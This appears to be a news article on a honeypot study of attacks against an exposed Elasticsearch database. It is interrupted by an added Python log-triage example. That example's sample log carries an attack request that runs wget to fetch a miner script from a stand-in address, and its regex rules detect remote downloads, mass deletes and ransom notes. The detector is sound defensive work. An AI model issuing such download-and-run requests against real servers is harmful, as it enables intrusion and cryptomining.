Unsecured databases left exposed on the web are targeted by cyber criminals at least eighteen times each day for as long as they remain exposed, research by Comparitech has revealed.
The security firm, which over the past few years has found a large number of unsecured databases owned by large corporations exposed on the web, recently conducted a practical test to check how interested cyber criminals are in discovering exposed databases and stealing the data stored in them.
In a vast majority of cases where companies have been caught storing vast amounts of personal information of their customers in unsecured databases that are public-facing, companies have stated that they found no evidence of any unauthorised access to the exposed databases and therefore, the exposure did not turn into a breach.
To demonstrate that unsecured databases do not somehow escape the attention of hackers, researchers at Comparitech set up a honeypot Elasticsearch database and put fake user data inside of it before leaving it publicly exposed to see who would connect to it and how they would try to steal, scrape, or destroy the data.
Between 11th May and 22nd May, the researchers observed as many as 175 cyber attacks targeting the unsecured database, with the first attack taking place a mere eight hours after the database was left exposed. On 16th May, the day the database was indexed by the Shodan IoT search engine, the database suffered as many as twenty-two attacks, two of them taking place within a minute after the database was indexed.
“It’s worth noting that over three dozen attacks occurred before the database was even indexed by search engines, demonstrating how many attackers rely on their own proactive scanning tools rather than waiting on passive IoT search engines like Shodan to crawl vulnerable databases,” wrote Paul Bischoff, privacy advocate at Comparitech.com.
On 29th May, the unsecured database was at the receiving end of a ransomware attack that deleted the contents of the database and left a message with contact information and request for payment. “If you want to recover your data send 0.06 BTC to [redacted] and you must send email to [redacted] with your IP. If you need proof about your data just send an email. If you don’t do a payment all your data may be used for our purposes and/or will be leaked/sold,” the ransom note read.
Out of the 175 attacks that took place between 11th May and 22nd May, 89 came from the United States, 38 came from Romania, and 15 came from China. However, considering that IP addresses can be changed using a proxy to mask an attacker’s true location, the true places of origin of these attacks could, in reality, be vastly different.
Comparitech also observed that many of the attacks targeted a remote code execution exploit on Elasticsearch servers (CVE-2015-1427) to gain access to the environment and download a bash-script miner using a wget command. Other attacks included an attempt at credential theft, an attempt to change the server configuration to delete all the data stored inside, and an attempt at installing a crypto mining script.
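The attack categories listed above (scripted-search RCE attempts, wget-fetched payloads, wipe-and-ransom, configuration changes) are easy to triage from request logs. The following added example, not code from Comparitech's honeypot, runs a small rule set over constructed sample lines in a hypothetical tab-separated format (timestamp, source IP, method, path, status, body snippet) and counts flagged requests per source address; Elasticsearch itself writes no such log, so the format is assumed to come from a proxy in front of the node.

```python
import re
from collections import Counter

# Constructed sample lines (not from the Comparitech honeypot) in a hypothetical
# tab-separated format: timestamp, source IP, HTTP method, path, status, body snippet.
SAMPLE_LOG = """\
2020-05-16T10:01:02Z\t203.0.113.5\tGET\t/\t200\t-
2020-05-16T10:01:09Z\t203.0.113.5\tPOST\t/_search\t200\t{"script_fields":{"x":{"script":"... wget http://203.0.113.5/m.sh ..."}}}
2020-05-16T10:02:30Z\t198.51.100.7\tGET\t/_cat/indices\t200\t-
2020-05-16T10:02:31Z\t198.51.100.7\tDELETE\t/_all\t200\t-
2020-05-16T10:02:32Z\t198.51.100.7\tPUT\t/read_me/_doc/1\t201\t{"msg":"send 0.06 BTC to [redacted]"}
2020-05-16T10:03:00Z\t192.0.2.9\tPUT\t/_cluster/settings\t200\t{"transient":{"action.destructive_requires_name":false}}
"""

# Each rule: tag, method pattern, path pattern, body pattern (all three must match).
RULES = [
    # Scripted search on an unauthenticated node: the dynamic-scripting vector of CVE-2015-1427.
    ("script_rce_attempt", r".", r"^/_search", r'"script'),
    # Request body that pulls a remote file, like the wget-fetched miner script.
    ("remote_download", r".", r".", r"\b(wget|curl)\s+https?://"),
    # Wildcard delete of every index: the ransomware's wipe step.
    ("mass_delete", r"^DELETE$", r"^/(_all|\*)$", r"."),
    # Cluster-wide settings change (server configuration tampering).
    ("settings_change", r"^(PUT|POST)$", r"^/_cluster/settings", r"."),
    # Document written to a regular index that carries a crypto ransom demand.
    ("ransom_note", r"^(PUT|POST)$", r"^/[^_][^/]*/", r"\b(BTC|bitcoin)\b"),
]

def parse_line(line):
    """Split one constructed log line into a dict of its six fields."""
    ts, ip, method, path, status, body = line.split("\t", 5)
    return {"ts": ts, "ip": ip, "method": method, "path": path,
            "status": int(status), "body": body}

def classify(event):
    """Return the tags of every rule matching this request (empty if benign)."""
    return [tag for tag, m, p, b in RULES
            if re.search(m, event["method"]) and re.search(p, event["path"])
            and re.search(b, event["body"], re.IGNORECASE)]

def analyze(log_text):
    """Count matched tags overall and flagged requests per source IP."""
    by_tag, by_ip = Counter(), Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        tags = classify(event)
        by_tag.update(tags)
        if tags:
            by_ip[event["ip"]] += 1
    return {"by_tag": by_tag, "by_ip": by_ip}
```

On the sample, the reconnaissance requests (GET / and /_cat/indices) are left unflagged, while the wipe-then-note sequence from one address is counted twice against it.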
Commenting on the results of Comparitech’s research, David Kennefick, product architect at Edgescan, said that accidental exposure of databases is a lot more common than people think, and that exposed databases typically arise when teams manage technologies that lack default controls to lock down machines and servers from external access.
“There has been a substantial improvement during the great cloud migration. Using a service such as AWS or Azure, which automatically locks down your machines and services, is a great way to reduce the likelihood of leaving something exposed. These providers, in fact, have this control enabled by default, meaning that users have to go out of their way to leave anything exposed on the internet,” he added.